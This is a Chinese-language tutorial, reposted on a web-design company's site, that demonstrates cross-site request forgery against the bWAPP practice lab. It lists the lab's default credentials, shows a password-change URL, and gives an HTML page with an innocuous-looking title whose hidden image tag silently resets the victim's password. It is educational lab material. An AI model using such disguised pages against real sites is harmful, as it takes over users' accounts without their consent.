這篇文章給大家介紹如何解析CSRF漏洞,內容非常詳細,感興趣的小伙伴們可以參考借鑒,希望對大家能有所幫助。
公司主營業務:網站制作、成都網站建設、移動網站開發等業務。幫助企業客戶真正實現互聯網宣傳,提高企業的競爭能力。創新互聯建站是一支青春激揚、勤奮敬業、活力青春激揚、勤奮敬業、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業文化,感謝他們對我們的高要求,感謝他們從不同領域給我們帶來的挑戰,讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。創新互聯建站推出郾城免費做網站回饋大家。
CSRF:跨站請求偽造,偽裝成用戶身份來執行一些非用戶自愿的惡意以及非法操作
CSRF和XSS區別:
1、CSRF需要登陸后操作,XSS不需要
2、CSRF通過偽裝成受信任用戶請求受信任的網站
一、環境:BWAPP
二、登陸,默認賬號為:bee,密碼為:bug
三、選擇從在csrf的頁面,將密碼修改為1111,change
四、分析url
http://192.168.1.119/bwapp/csrf_1.php?password_new=1111&password_conf=1111&action=change
五、退出賬號,重新登陸一下,密碼已經修改為1111
六、重修修改一下url,直接訪問這個這個地址,
http://192.168.1.119/bwapp/csrf_1.php?password_new=2222&password_conf=2222&action=change
密碼被重置為2222
七、隱蔽利用
1、新建一個html頁面,將url地址重新修改一下,添加到img標簽下的src屬性,
<!DOCTYPE html> <html> <head> <title>哎呦不錯哦。。。</title> </head> <body> <h3>好久不見<h3> <img src="http://192.168.1.119/bwapp/csrf_1.php?password_new=3333&password_conf=3333&action=change"> </body> </html>
2、訪問這個html,自動訪問修改后的url,密碼也自動修改了
關于如何解析CSRF漏洞就分享到這里了,希望以上內容可以對大家有一定的幫助,可以學到更多知識。如果覺得文章不錯,可以把它分享出去讓更多的人看到。
網站題目:如何解析CSRF漏洞
轉載注明:http://m.newbst.com/article24/gssdce.html
成都網站建設公司_創新互聯,為您提供關鍵詞優化、做網站、企業網站制作、網站設計、App設計、虛擬主機
聲明:本網站發布的內容(圖片、視頻和文字)以用戶投稿、用戶轉載內容為主,如果涉及侵權請盡快告知,我們將會在第一時間刪除。文章觀點不代表本網站立場,如需處理請聯系客服。電話:028-86922220;郵箱:631063699@qq.com。內容未經允許不得轉載,或轉載時需注明來源: 創新互聯